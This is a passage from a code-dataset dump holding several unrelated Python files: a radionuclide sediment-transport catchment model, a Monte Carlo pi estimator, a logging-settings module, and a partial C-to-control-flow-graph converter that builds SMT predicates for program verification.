isotop['top_layer']['zapas']\n # and liquid flow out\n isotop['top_layer']['zapas'] -= isotop['top_layer']['liquid_flow']\n\n def radioactive_decay(self):\n for isotop in self.isotopes:\n isotop['top_layer']['zapas'] -= isotop['decay_constant'] * isotop['top_layer']['zapas']\n isotop['bottom_layer']['zapas'] -= isotop['decay_constant'] * isotop['bottom_layer']['zapas']\n\n def deposition(self):\n for isotop in self.isotopes:\n isotop['top_layer']['zapas'] += isotop['inflow']\n isotop ['inflow'] = 0\n\n def recalculation_activity_concentration(self):\n if self.land_type != 'w':\n for isotop in self.isotopes:\n isotop['top_layer']['activity_concentration'] = isotop['top_layer']['zapas'] / (self.size**2 *self.soil_density*(0.2*10*10))\n isotop['bottom_layer']['activity_concentration'] = isotop['bottom_layer']['zapas'] / (self.size**2 *self.soil_density*(1.8*10*10))\n isotop['top_layer']['soluble_zapas'] = isotop['top_layer']['soluble_part'] * isotop['top_layer']['zapas']\n\n def year_redistribution(self):\n self.infiltration()\n self.deposition()\n self.radioactive_decay()\n self.recalculation_activity_concentration()\n\nclass CatchmentArea():\n '''\n Класс, описывающий водосбор в целом, содержит catchment -- массив с отдельными ячейками модели\n Содержит функции подготовки ячеек к расчету стока и собственно функции рассчета стока\n '''\n def __init__(self, datafile=datafile):\n self.catchment = []\n with open(datafile) as f:\n reader = csv.reader(f)\n for row in reader:\n SC = SoilCell(int(row[0]), int(row[1]), float(row[2]), str(row[3]), float(row[4]), float(row[5]), cs137_s_part=float(row[6]), w0=float(row[7]))\n self.catchment.append(SC)\n \n for cell in self.catchment :\n cell.findOutputCell(self.catchment)\n for cell in self.catchment :\n cell.findUpWayCells(self.catchment)\n for cell in self.catchment:\n cell.calculateAngle()\n cell.calculateLS()\n cell.calculateSoilLoss()\n cell.calculate_max_outflow_capicity()\n\n def sediment_flow(self):\n flow_run = True\n while flow_run:\n flow_run = False\n for sc in self.catchment:\n if len(sc.up_way_cells) == 0 and sc.output_cell != None and sc.land_type != 'w':\n if sc.sediment_inflow + sc.soil_loss < sc.max_outflow_capicity:\n outflo = sc.sediment_inflow + sc.soil_loss\n for isotope, output_isotope in zip(sc.isotopes, sc.output_cell.isotopes):\n temp_isotop = isotope['inflow'] + sc.soil_loss * isotope['top_layer']['activity_concentration']\n output_isotope['inflow'] += temp_isotop\n isotope['top_layer']['zapas'] -= temp_isotop\n sc.sediment_inflow = 0\n else:\n outflo = sc.max_outflow_capicity\n for isotope, output_isotope in zip(sc.isotopes, sc.output_cell.isotopes):\n if sc.soil_loss > sc.max_outflow_capicity or sc.sediment_inflow < 0.001:\n temp_isotop = sc.max_outflow_capicity * isotope['top_layer']['activity_concentration']\n else:\n temp_isotop = sc.soil_loss * isotope['top_layer']['activity_concentration'] + (sc.max_outflow_capicity - sc.soil_loss) * isotope['inflow']/sc.sediment_inflow\n output_isotope['inflow'] += temp_isotop\n isotope['top_layer']['zapas'] -= temp_isotop\n sc.sediment_inflow -= sc.max_outflow_capicity\n sc.output_cell.sediment_inflow += outflo\n sc.output_cell.up_way_cells.remove(sc)\n sc.output_cell = None\n flow_run = True\n\n def one_season_flow(self):\n for cell in self.catchment :\n cell.sediment_inflow = 0 # Здесь обнуляю перенос массы почвы до ее подсчета\n w_e = 2*np.random.randn() + 20\n n_fl = 0.5*np.random.randn() + 2\n n_fl = n_fl if n_fl > 0.5 else 0.5\n for cell in self.catchment :\n cell.calculate_liquid_outflow(w_e, n_fl)\n self.sediment_flow() \n for cell in self.catchment :\n cell.year_redistribution()\n cell.up_way_cells = cell.up_way_cells_storage[:]\n if cell.output_cell_storage :\n cell.output_cell = cell.output_cell_storage\n \n def calculate_pond_accumulation(self): \n sum_cs = 0\n sum_am = 0\n sum_lq = 0\n sed = 0\n for cell in self.catchment:\n if cell.land_type == 'w':\n sed += cell.sediment_inflow\n sum_cs += cell.isotopes[0]['top_layer']['zapas']\n sum_am += cell.isotopes[1]['top_layer']['zapas']\n else:\n sum_lq += cell.isotopes[0]['top_layer']['liquid_flow']\n return sed, sum_cs, sum_lq, sum_am\n\n def one_iteration(self, outfil=outfile):\n self.one_season_flow()\n mod_data = self.calculate_pond_accumulation()\n out_string = '%d,%.3e,%.2e,%.2e,%.2e\\n' % (i, mod_data[0], mod_data[1], mod_data[2], mod_data[3])\n with open(outfile, 'a') as outfl:\n outfl.write(out_string)\n\n def many_iterations(self, period, outfil=outfile):\n disolved_cs137 = 0\n disolved_am241 = 0\n sediments = 0\n for i in range(period):\n self.one_season_flow()\n mod_data = self.calculate_pond_accumulation()\n disolved_cs137 += mod_data[2]\n disolved_cs137 -= cs137_decay_constant * disolved_cs137\n ##disolved_am241 += mod_data[3]\n sediments += mod_data[0]\n mod_data = self.calculate_pond_accumulation()\n \n out_string = '%d,%.3e,%.2e,%.2e,%.2e\\n' % (i, sediments, mod_data[1], disolved_cs137, mod_data[3])\n with open(outfile, 'a') as outfl:\n outfl.write(out_string)\n\nif __name__ == '__main__':\n #try :\n print(sys.argv[1])\n n_iterations = int(sys.argv[2])\n if sys.argv[1] == '1':\n with open(outfile, 'w') as outfl:\n outfl.write('iteration,solid_sediment_kg,solid_cs137_Bq,liquid_cs137_bq,solid_am241_bq\\n')\n for i in tqdm_notebook(range(n_iterations)):\n catchment = CatchmentArea()\n catchment.one_iteration()\n else: \n #try: \n period = int(sys.argv[1])\n with open(outfile, 'w') as outfl:\n outfl.write('iteration,solid_sediment_kg,solid_cs137_Bq,liquid_cs137_bq,solid_am241_bq\\n')\n for i in range(n_iterations):\n catchment = CatchmentArea()\n catchment.many_iterations(period)\n #except:\n # print(\"Can't interpret period {}\".format(sys.argv[1]))\n #except :\n # print('RTFM')\n","repo_name":"nikitinale/lateral_psrer","sub_path":"model_double.py","file_name":"model_double.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16794830556","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Estimate value of Pi\n\nimport numpy as np\nimport math\nimport random\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#Now lets initialze square size and no. of points inside square and cirlce\n\nsquare_size = 1\npoints_inside_circle = 0\npoints_inside_sqaure = 0\nsample_size = 1000\narc = np.linspace(0,np.pi/2,100)\n\n\n# In[3]:\n\n\n#define the fuction that generates random points inside square\n\ndef generate_points(size):\n x = random.random()*size\n y = random.random()*size\n return(x,y)\n\n\n# In[4]:\n\n\n#define a function to check if a point falls within circle\ndef is_in_circle(point,size):\n return math.sqrt(point[0]**2+point[1]**2)<=size\n\n\n# In[6]:\n\n\n#define a function for calculating pi value\n\ndef compute_pi(points_inside_circle,points_inside_sqaure):\n return 4*(points_inside_circle/points_inside_sqaure)\n\n\n# In[8]:\n\n\nplt.axes().set_aspect('equal')\nplt.plot(1*np.cos(arc), 1*np.sin(arc))\n\nfor i in range(sample_size):\n point = generate_points(square_size)\n plt.plot(point[0],point[1],'c.')\n points_inside_sqaure +=1\n if is_in_circle(point,square_size):\n points_inside_circle +=1\n\n\n# In[9]:\n\n\nprint('Apprx value of pi is {}'.format(compute_pi(points_inside_circle,points_inside_sqaure)))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"anuraj76/Python-Programming","sub_path":"MonteCarlo Basic Understanding.py","file_name":"MonteCarlo Basic Understanding.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3695009308","text":"import os\n\n\n# Кодировка проекта\nENCODING = \"utf-8\"\n\n# Ключи используемые в протоколе логирования\nROOT = os.getcwd()\nDIR_LOG = \"logs\"\n\nLOG_DIRECTORY = os.path.join(ROOT, DIR_LOG)\nLOG_FILENAME = os.path.join(LOG_DIRECTORY, \"app.log\")\n\nLOGGER_NAME = __name__\n\nWHEN_INTERVAL = \"D\"\n\n# Красивости\nINDENT = 30 * \"-\"","repo_name":"halexx7/DJ_uk_newcity","sub_path":"newcity/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5625894000","text":"import sys\nfrom pycparser import *\nimport pycparser\nfrom typing import *\n\nimport treeutil\nimport util\nfrom graphviz import Digraph\nimport logging\nlogging.basicConfig(level=logging.WARNING)\nimport smtutil\n\nFORCE_NOMERGE = False\n\ndef is_error_function(x: str) -> bool:\n if x == \"errorFn\":\n return True\n if x.startswith(\"__VERIFIER_error\"):\n return True\n return False\n\ndef is_assumption(x: str) -> bool:\n return x in [\"assume\", \"__VERIFIER_assume\"]\n\n\ndef is_assertion(x: str) -> bool:\n return x in [\"assert\", \"__VERIFIER_assert\"]\n\n\ndef is_nondet(x: str) -> bool:\n if x.startswith(\"unknown\"):\n return True\n return False\n\n\ndef is_nondet_int(x: str) -> bool:\n if x.startswith(\"__VERIFIER_nondet_int\") or x.startswith(\"__VERIFIER_nondet_bool\") or x == \"rand\" or x == \"nondet\":\n return True\n return False\n\n\ndef is_nondet_unsigned(x: str) -> bool:\n if x.startswith(\"__VERIFIER_nondet_uint\"):\n return True\n return False\n\ndef is_ignoring_function_name(x: str) -> bool:\n return is_error_function(x) or is_nondet(x) or is_nondet_int(x) or is_assumption(x) or is_assertion(x) or is_nondet_unsigned(x) or x.startswith(\"__VERIFIER_nondet\") or x == \"__mark\"\n\nclass CFGVar():\n def __init__(self,\n name: str,\n typ: str) -> None:\n self.name: str = name\n self.typ: str = typ\n def __eq__(self, opponent):\n return self.name == opponent.name and self.typ == opponent.typ\n def __hash__(self):\n return hash((self.name, self.typ))\n\n# nesting of (type: str, value of str or CFGValue, ...)\nclass CFGValue():\n def __init__(self, x: Any = None):\n if x is None:\n x = (\"Constant\", \"true\", \"bool\")\n self.val: Any = x\n def __str__(self):\n if self.val[0] == \"Nondet\":\n return \"ND\"\n elif self.val[0] == \"Constant\":\n return self.val[1]\n elif self.val[0] == \"NondetInt\":\n return \"*nondetint\"\n elif self.val[0] == \"NondetUnsigned\":\n return \"*nondetunsigned\"\n elif self.val[0] == \"Var\":\n return self.val[1]\n elif self.val[0] == \"Unary\":\n return f\"{self.val[1]} {self.val[2]}\"\n elif self.val[0] == \"Binary\":\n return f\"{self.val[2]} {self.val[1]} {self.val[3]}\"\n else:\n raise Exception(\"Unexpected formula\")\n\nclass Operation:\n pass\n\nclass OperationBin(Operation):\n def __init__(self, lhs_: str, rhs_: CFGValue, op_: str):\n self.lhs: str = lhs_\n self.rhs: CFGValue = rhs_\n self.op: str = op_\n def __str__(self) -> str:\n return f\"{self.lhs} {self.op} {self.rhs}\"\n\nclass OperationUni(Operation):\n def __init__(self, v_: str, op: str):\n self.v = v_\n self.op = op\n def __str__(self) -> str:\n if self.op == \"p++\":\n return f\"{self.v}++\"\n elif self.op == \"p--\":\n return f\"{self.v}--\"\n elif self.op == \"++\":\n return f\"++{self.v}\"\n elif self.op == \"--\":\n return f\"--{self.v}\"\n else:\n return f\"????\"\n\nclass CFGNode():\n def __init__(self, id_: int):\n self.id: int = id_\n self.coming: Set[CFGEdge] = set()\n self.going: Set[CFGEdge] = set()\n def __str__(self):\n return f\"N{self.id}\"\n\nclass CFGEdge():\n def __init__(self,\n id_: int,\n source_: CFGNode,\n target_: CFGNode,\n pred_: CFGValue,\n op_: Optional[OperationBin]):\n self.id = id_\n self.source: CFGNode = source_\n self.target: CFGNode = target_\n self.condition: CFGValue = pred_\n self.operation: Optional[OperationBin] = op_\n self.pred: util.Tree = None\n self.vars: List[str] = []\n def __str__(self):\n s = \"\"\n if self.condition.val == (\"Constant\", \"true\", \"bool\"):\n pass\n else:\n s = f\"[{str(self.condition)}]\"\n t = \"\"\n if self.operation is not None:\n t = str(self.operation)\n return f\"{self.id})\" + s + t\n def get_predicate_as_str(self):\n return util.debug_print_list(self.pred)\n\n\nclass GotoManager:\n def __init__(self):\n self.sources: Set[CFGNode] = set()\n self.target: Optional[CFGNode] = None\n def swap(self, a: CFGNode, b: CFGNode):\n if a in self.sources:\n self.sources.remove(a)\n self.sources.add(b)\n if self.target == a:\n self.target = b\n\nclass ControlFlowGraph():\n def __init__(self):\n self.initial: CFGNode = CFGNode(0)\n self.final: CFGNode = CFGNode(1)\n self.exit: CFGNode = self.initial\n self.nodes: List[CFGNode] = [self.initial, self.final]\n self.edges: List[CFGEdge] = []\n self.vars: Set[CFGVar] = set()\n def get_vars_as_dict(self) -> Dict[str, str]:\n return dict([(x.name, x.typ) for x in self.vars])\n def add_edge(self,\n src: CFGNode,\n tgt: Optional[CFGNode],\n cond: CFGValue,\n op: Optional[Operation]) -> Tuple[CFGEdge, CFGNode]:\n assert op is None or isinstance(op, Operation)\n assert self.nodes[src.id] == src\n if tgt is not None:\n assert self.nodes[tgt.id] == tgt\n if tgt is None:\n tgt = CFGNode(len(self.nodes))\n self.nodes.append(tgt)\n assert self.nodes[tgt.id] == tgt\n e = CFGEdge(len(self.edges), src, tgt, cond, op)\n e.source = src\n e.target = tgt\n e.condition = cond\n e.operation = op\n src.going.add(e)\n tgt.coming.add(e)\n self.edges.append(e)\n return e, tgt\n def remove_edge(self, e: CFGEdge) -> None:\n assert self.edges[e.id] == e\n e.source.going.remove(e)\n e.target.coming.remove(e)\n\n # for n in self.nodes[e.id:]:\n # n.id -= 1\n self.edges.remove(e)\n for i, n in enumerate(self.nodes):\n n.id = i\n for i, e in enumerate(self.edges):\n e.id = i\n def remove_node(self, n: CFGNode) -> None:\n assert self.nodes[n.id] == n\n assert n != self.initial\n assert False\n\n def print(self, name=\"print\", style=\"c\") -> None:\n G = Digraph(format=\"png\")\n\n for n in self.nodes:\n # logging.debug(f\"node from {n.id}\")\n if n == self.initial:\n G.node(str(n.id), f\"ENTRY\")\n elif n == self.final:\n G.node(str(n.id), f\"ERROR\")\n else:\n G.node(str(n.id), f\"N{n.id}\")\n for e in self.edges:\n # logging.debug(f\"edge from {e.source.id} to {e.target.id}\")\n if style == \"c\":\n s = str(e)\n elif style == \"pred\":\n s = e.get_predicate_as_str()\n G.edge(str(e.source.id), str(e.target.id), s, fontsize=\"8\")\n G.render(name)\n def _check_consistency(self):\n # coming\n comings: Dict[CFGNode, Set[CFGEdge]] = {x: set() for x in self.nodes}\n for e in self.edges:\n comings[e.target].add(e)\n for n in self.nodes:\n assert comings[n] == n.coming\n # going\n goings: Dict[CFGNode, Set[CFGEdge]] = {x: set() for x in self.nodes}\n for e in self.edges:\n goings[e.source].add(e)\n for n in self.nodes:\n assert goings[n] == n.going\n # edge -> node -> edge consitency\n for e in self.edges:\n assert e in e.source.going\n assert e in e.target.coming\n # node -> edge -> node consistency\n for n in self.nodes:\n for e in n.going:\n assert n == e.source\n for e in n.coming:\n assert n == e.target\n def _make_pred_edge(self, cfg_edge: CFGEdge, theory: str, bitwidth: int) -> Tuple[util.Tree, List[str]]:\n \"\"\"Converts the operations in C to LIA formulae.\"\"\"\n cfg_ = self\n vars = []\n unary_trans = {\"!\": \"not\"}\n binary_trans = {\"==\": \"=\", \"||\": \"or\", \"&&\": \"and\", \"/\": \"div\"}\n def trans(x: str, trans: Dict[str, str]):\n if x in trans:\n return trans[x]\n return x\n integers = [\"int\", \"unsigned\"]\n type2bits = {\"int\": bitwidth, \"unsigned\": bitwidth}\n var2ctype = dict({x.name: x.typ for x in cfg_.vars})\n def get_type(x: Any) -> str:\n if x.val[0] == \"Constant\":\n if x.val[2] in type2bits:\n return \"int\"\n # return x.val[2]\n elif x.val[2] == \"bool\":\n return \"bool\"\n else:\n raise Exception(f\"Unsupported type {x.val[2]}\")\n elif x.val[0] == \"Var\":\n varname = x.val[1]\n return var2ctype[varname]\n elif x.val[0] == \"Nondet\":\n return \"bool\"\n elif x.val[0] == \"NondetInt\":\n return \"int\"\n elif x.val[0] == \"NondetUnsigned\":\n return \"unsigned\"\n elif x.val[0] == \"Unary\":\n ty = get_type(x.val[2])\n if x.val[1] == \"!\":\n return \"bool\"\n elif x.val[1] == \"-\":\n return \"int\"\n else:\n assert False\n elif x.val[0] == \"Binary\":\n # temporarily\n lt = get_type(x.val[2])\n rt = get_type(x.val[3])\n if lt == \"Var\":\n lt = var2ctype[x.val[2][1]]\n if rt == \"Var\":\n rt = var2ctype[x.val[3][1]]\n if x.val[1] in [\"==\", \"!=\"]:\n if lt == rt or (lt in integers and rt in integers):\n pass\n else:\n raise Exception(\"Type mismatch\")\n return \"bool\"\n elif x.val[1] in [\"<=\", \"<\", \">\", \">=\"]:\n if lt in integers and rt in integers:\n pass\n else:\n raise Exception(\"Values have to be int in inequalities\")\n return \"bool\"\n elif x.val[1] in [\"||\", \"&&\"]:\n return \"bool\"\n elif x.val[1] in [\"+\", \"*\", \"-\", \"/\", \"%\"]:\n if lt in integers and rt in integers:\n pass\n else:\n raise Exception(\"Values have to be int\")\n return \"int\"\n else:\n raise f\"Unexpected operator {x.val[1]}\"\n else:\n assert False\n def int_to_bool(t) -> Any:\n return [\"not\", [\"=\", t, 0]]\n def bool_to_int(t) -> Any:\n tag = t[0]\n if type(t) is str and treeutil.undecorate(t)[0] in var2ctype:\n return t\n elif type(t) is list:\n if tag in [\"true\", True]:\n assert len(t) == 1\n return 1 \n elif tag in [\"false\", False]:\n assert len(t) == 1\n return 0\n elif tag == \"not\":\n assert len(t) == 2\n return [\"-\", 1, bool_to_int(t[1])]\n elif tag == \"=\":\n assert len(t) == 3\n if t[2] in [\"0\", 0]:\n return [\"-\", 1, bool_to_int(t[1])]\n elif t[1] in [\"0\", 0]:\n return [\"-\", 1, bool_to_int(t[2])]\n else:\n assert False\n else:\n raise Exception(f\"Unsupported boolean assignment: {t}\")\n else:\n assert False\n def ite(cond: Any, t: Any, f: Any) -> Any:\n return [\"ite\", cond, t, f]\n # return [\"and\", [\"=>\", cond, t], [\"=>\", [\"not\", cond], f]]\n def helper(x: Any) -> Any:\n if x.val[0] == \"Constant\":\n if x.val[2] in [\"bool\"] + integers:\n if util.re_hex.match(x.val[1]) is not None:\n return int(x.val[1], 16)\n elif x.val[1].lstrip(\"+-\").isnumeric():\n return int(x.val[1])\n elif x.val[1] in [\"true\", \"false\"]:\n return x.val[1]\n else:\n assert False\n else:\n assert False\n elif x.val[0] == \"Var\":\n v = treeutil.decorate(x.val[1], 0)\n vars.append(v)\n return v\n elif x.val[0] == \"NondetInt\":\n return \"*nondetint\"\n elif x.val[0] == \"NondetUnsigned\":\n return \"*nondetunsigned\"\n elif x.val[0] == \"Nondet\":\n return \"true\"\n elif x.val[0] == \"Unary\":\n op = trans(x.val[1], unary_trans)\n if op in [\"-\", \"not\"]:\n ty = get_type(x.val[2])\n if op == \"not\":\n if ty in integers:\n return [\"not\", int_to_bool(helper(x.val[2]))]\n elif ty == \"bool\":\n return [\"not\", helper(x.val[2])]\n else:\n assert False\n elif op == \"-\":\n return [op, helper(x.val[2])]\n else:\n assert False\n else:\n assert False\n logging.warning(\"Unexpected unary symbol \" + str(op))\n return [op, helper(x.val[2])]\n elif x.val[0] == \"Binary\":\n if x.val[1] in [\"+\", \"-\", \"*\", \"div\", \"<=\", \">=\", \"<\", \">\", \"==\"] or x.val[1] in binary_trans:\n left_sub = helper(x.val[2])\n right_sub = helper(x.val[3])\n op = binary_trans.get(x.val[1], x.val[1])\n if op in [\"and\", \"or\"]:\n left_sub = int_to_bool(left_sub) if get_type(x.val[2]) in integers else left_sub\n right_sub = int_to_bool(right_sub) if get_type(x.val[3]) in integers else right_sub\n return [op, left_sub, right_sub]\n elif x.val[1] == \"!=\":\n return [\"not\", [\"=\", helper(x.val[2]), helper(x.val[3])]]\n elif x.val[1] == \"%\":\n return [\"mod\", helper(x.val[2]), helper(x.val[3])]\n else:\n assert False\n logging.warning(\"Unexpected symbol \" + str(x.val[1]))\n return [x.val[1], helper(x.val[2]), helper(x.val[3])]\n else:\n raise Exception(\"Unexpected predicate \" + str(x))\n slist_cond = helper(cfg_edge.condition)\n\n if get_type(cfg_edge.condition) in integers:\n slist_cond = int_to_bool(slist_cond)\n if cfg_edge.operation is None:\n res = slist_cond\n else:\n if isinstance(cfg_edge.operation, OperationBin):\n slist_upd_rhs = helper(cfg_edge.operation.rhs)\n var_upd_lhs = treeutil.decorate(cfg_edge.operation.lhs, 1)\n type_left = var2ctype[cfg_edge.operation.lhs] \n type_right = get_type(cfg_edge.operation.rhs)\n if type_left in integers and type_right in integers:\n pass\n elif type_left in integers and type_right == \"bool\":\n slist_upd_rhs = bool_to_int(slist_upd_rhs)\n else:\n raise Exception(\"Mismatched type in assignment\")\n vars.append(var_upd_lhs)\n if cfg_edge.operation.op == \"=\":\n slist_upd = [\"=\", var_upd_lhs, slist_upd_rhs]\n elif cfg_edge.operation.op in [\"+=\", \"-=\", \"*=\"]:\n var_cur_lhs = treeutil.decorate(cfg_edge.operation.lhs, 0)\n slist_upd = [\"=\", var_upd_lhs, [cfg_edge.operation.op[0], var_cur_lhs, slist_upd_rhs]]\n else:\n raise Exception(f\"Unexpected type of assignment {cfg_edge.operation.op}\")\n elif isinstance(cfg_edge.operation, OperationUni):\n slist_upd_rhs = treeutil.decorate(cfg_edge.operation.v, 0)\n var_upd_lhs = treeutil.decorate(cfg_edge.operation.v, 1)\n if cfg_edge.operation.op == \"p++\":\n slist_upd = [\"=\", var_upd_lhs, [\"+\", slist_upd_rhs, 1]]\n elif cfg_edge.operation.op == \"p--\":\n slist_upd = [\"=\", var_upd_lhs, [\"-\", slist_upd_rhs, 1]]\n elif cfg_edge.operation.op == \"++\":\n slist_upd = [\"=\", var_upd_lhs, [\"+\", slist_upd_rhs, 1]]\n elif cfg_edge.operation.op == \"--\":\n slist_upd = [\"=\", var_upd_lhs, [\"-\", slist_upd_rhs, 1]]\n else:\n raise Exception(f\"Non supported op {cfg_edge.operation.op}\")\n else:\n raise Exception(f\"Unspported Operation {cfg_edge.operation}\")\n res = [\"and\", slist_upd, slist_cond]\n assert res != []\n if theory == \"liabv\":\n replaced = treeutil.replace_symbols_for_bv(res, 2 ** bitwidth, \"depends\", var2ctype)\n elif theory == \"lia\":\n replaced = res\n else:\n assert False\n return replaced, vars\n def make_predicates(self, theory: str, bitwidth: int):\n for e in self.edges:\n p, v = self._make_pred_edge(e, theory, bitwidth)\n e.pred = p\n e.vars = v\n\n\n\n\ndef join_CFG(\n cfg1: ControlFlowGraph,\n cfg2: ControlFlowGraph,\n source_: Optional[CFGNode] = None,\n target_: Optional[CFGNode] = None,\n cond: CFGValue = None,\n goto_dict: Dict[str, GotoManager] = None,\n returns: Set[CFGNode] = None) -> ControlFlowGraph:\n # process source and target\n source = source_ if source_ is not None else cfg1.exit\n target = target_ if target_ is not None else cfg2.initial\n # stop if cfg1 is dying\n # if cfg1.exit == cfg1.final:\n # return cfg1\n # is merge mode on?\n if cond is None:\n merge_mode = True\n cond = CFGValue()\n else:\n merge_mode = False\n # disable merging if it is related to jump\n for k, v in goto_dict.items():\n if target in v.sources:\n merge_mode = False\n break\n if target == v.target:\n merge_mode = False\n break\n if target in returns:\n merge_mode = False\n merge_mode = merge_mode and (not FORCE_NOMERGE)\n # move nodes from cfg2 to cfg1 (rename ids)\n # cfg1.nodes.append(cfg2.nodes[0])\n # cfg1.nodes[-1].id = len(cfg1.nodes) - 1\n # assert cfg1.nodes[cfg1.nodes[-1].id] == cfg1.nodes[-1]\n for n in cfg2.nodes: # exclude cfg2's final\n if merge_mode and n == target:\n logging.debug(f\"skipping {n.id}\")\n continue\n if n == cfg2.final:\n continue\n if n in cfg1.nodes:\n continue\n cfg1.nodes.append(n)\n cfg1.nodes[-1].id = len(cfg1.nodes) - 1\n assert cfg1.nodes[cfg1.nodes[-1].id] == cfg1.nodes[-1]\n # move edges from cfg2 to cfg1\n for e in cfg2.edges:\n if e in cfg1.edges:\n continue\n e.id = len(cfg1.edges)\n cfg1.edges.append(e)\n # convert the edges of (cfg2's init)->* to (cfg1's exit)->* preserving conditions\n # for e in cfg2.edges:\n # if e.source == cfg2.initial:\n # e.source = cfg1.exit\n # cfg1.exit.coming.add(e)\n if merge_mode:\n for e in cfg2.edges:\n if e.source == target:\n e.source = source\n source.going.add(e)\n if e.target == target:\n e.target = source\n source.coming.add(e)\n else:\n # connect from source to target\n cfg1.add_edge(source, target, cond, None)\n # merge cfg2's final into cfg1's final\n for e in cfg2.edges:\n if e.target == cfg2.final:\n e.target = cfg1.final\n cfg1.final.coming.add(e)\n # change exit\n if merge_mode and target == cfg2.exit:\n pass\n else:\n if cfg2.exit == cfg2.final:\n cfg1.exit = cfg1.final\n else:\n cfg1.exit = cfg2.exit\n # merge variables\n cfg1.vars.update(cfg2.vars)\n # assertion\n if cfg2.final == cfg2.exit:\n assert cfg1.final == cfg1.exit\n # change gotos\n if merge_mode:\n for k, v in goto_dict.items():\n v.swap(target, source)\n # change returns\n if merge_mode and target in returns:\n returns.remove(target)\n returns.add(source)\n return cfg1\n\ndef join_CFGs(cfgs: List[Optional[ControlFlowGraph]], goto_dict: Dict[str, GotoManager], returns: Set[CFGNode]) -> ControlFlowGraph:\n cfgs1: List[ControlFlowGraph] = [c for c in cfgs if c is not None]\n cfg = cfgs1[0]\n for c in cfgs1[1:]:\n cfg = join_CFG(cfg, c, None, None, None, goto_dict, returns)\n return cfg\n\ndef parse_exp(p: pycparser.c_ast.Node, pre: str = \"\") -> CFGValue:\n if type(p) is pycparser.c_ast.Constant:\n return CFGValue((\"Constant\", p.value, p.type))\n elif type(p) is pycparser.c_ast.ID:\n return CFGValue((\"Var\", pre + p.name))\n elif type(p) is pycparser.c_ast.UnaryOp:\n u: pycparser.c_ast.UnaryOp = p\n ex = parse_exp(u.expr, pre)\n if ex.val[0] == \"Nondet\":\n return CFGValue((\"Nondet\", ))\n return CFGValue((\"Unary\", u.op, ex))\n elif type(p) is pycparser.c_ast.BinaryOp:\n b: pycparser.c_ast.BinaryOp = p\n left = parse_exp(b.left, pre)\n right = parse_exp(b.right, pre)\n if left.val[0] == \"Nondet\" or left.val[0] == \"Nondet\":\n return CFGValue((\"Nondet\",))\n return CFGValue((\"Binary\", b.op, left, right))\n elif type(p) is pycparser.c_ast.FuncCall:\n fc: pycparser.c_ast.FuncCall = p\n if is_nondet(fc.name.name):\n return CFGValue((\"NondetInt\", ))\n elif is_nondet_int(fc.name.name):\n return CFGValue((\"NondetInt\", ))\n elif is_nondet_unsigned(fc.name.name):\n return CFGValue((\"NondetUnsigned\", ))\n else:\n raise Exception(f\"Unexpected function invoke: {fc}\")\n elif p is None:\n return CFGValue((\"Constant\", \"true\", \"bool\"))\n else:\n raise Exception(f\"Unexpected Operation: {p}\")\n\nclass BreakManager:\n def __init__(self):\n self.cnt = 0\n self.stack = []\n def push(self):\n s = f\"*dummy_break_{self.cnt}\"\n self.cnt += 1\n self.stack.append(s)\n return s\n def pop(self):\n return self.stack.pop()\n def get_top(self):\n return self.stack[-1]\n\ndef construct_CFG_help(p: pycparser.c_ast.Node, pre: str, goto_dict: Dict[str, GotoManager], returns: Set[CFGNode], stack_break: BreakManager) -> Optional[ControlFlowGraph]:\n def process_function(p: pycparser.c_ast.Node, pre: str) -> Optional[ControlFlowGraph]:\n if is_ignoring_function_name(p.name):\n return None\n elif p.name == \"main\":\n if type(p) is pycparser.c_ast.FuncDef:\n fd: pycparser.c_ast.FuncDef = cast(pycparser.c_ast.FuncDef, p)\n if type(fd.body) is pycparser.c_ast.Compound:\n comp: pycparser.c_ast.Compound = fd.body\n cfgs = [construct_CFG_help(c, pre, goto_dict, returns, stack_break) for c in comp.block_items]\n return join_CFGs(cfgs, goto_dict, returns)\n else:\n assert False\n else:\n raise Exception(\"Unexcepted type for main\")\n return None\n else:\n raise Exception(f\"Unexpected function definition {p.name}\")\n # cfg = ControlFlowGraph()\n if type(p) is pycparser.c_ast.FileAST:\n cs = [c[1] for c in p.children()]\n cfgs = [construct_CFG_help(c, pre, goto_dict, returns, stack_break) for c in cs]\n return join_CFGs(cfgs, goto_dict, returns)\n elif type(p) is pycparser.c_ast.FuncDef:\n fd: pycparser.c_ast.FuncDef = cast(pycparser.c_ast.FuncDef, p)\n logging.debug(f\"FuncDef {fd.decl.name}\")\n if fd.decl.name == \"main\":\n if type(fd.body) is pycparser.c_ast.Compound:\n if hasattr(fd.decl.type.args, \"params\"):\n decls = [construct_CFG_help(d, pre, goto_dict, returns, stack_break) for d in fd.decl.type.args.params]\n else:\n decls = []\n comp: pycparser.c_ast.Compound = fd.body\n cfgs = [construct_CFG_help(c, pre, goto_dict, returns, stack_break) for c in comp.block_items]\n return join_CFGs(decls + cfgs, goto_dict, returns)\n elif is_ignoring_function_name(fd.decl.name):\n return None\n raise Exception(\"Unexpected Function Definition/\" + str(p))\n # return process_function(fd, pre)\n elif type(p) is pycparser.c_ast.Decl:\n d: pycparser.c_ast.Decl = p\n if type(d.type) is pycparser.c_ast.FuncDecl:\n logging.debug(f\"Decl/FuncDecl {d.name}\")\n return process_function(d, pre)\n elif type(d.type) is pycparser.c_ast.TypeDecl:\n logging.debug(f\"Decl/TypeDecl {d.name}\")\n cfg = ControlFlowGraph()\n if d.init is None:\n typename = d.type.type.names[0]\n if typename == \"int\":\n # var = CFGVar(pre + \"*nondetint\", \"int\") # TODO: Is it needed?\n # cfg.vars.add(var)\n val = CFGValue((\"NondetInt\", ))\n # val = CFGValue((\"Constant\", \"0\", \"int\"))\n elif typename == \"unsigned\":\n val = CFGValue((\"NondetUnsigned\", ))\n else:\n raise Exception(\"Unexpected type name\")\n else:\n val = parse_exp(d.init, pre)\n var = CFGVar(pre + d.name, d.type.type.names[0])\n cfg.vars.add(var)\n ex = cfg.add_edge(cfg.initial, None, CFGValue(), 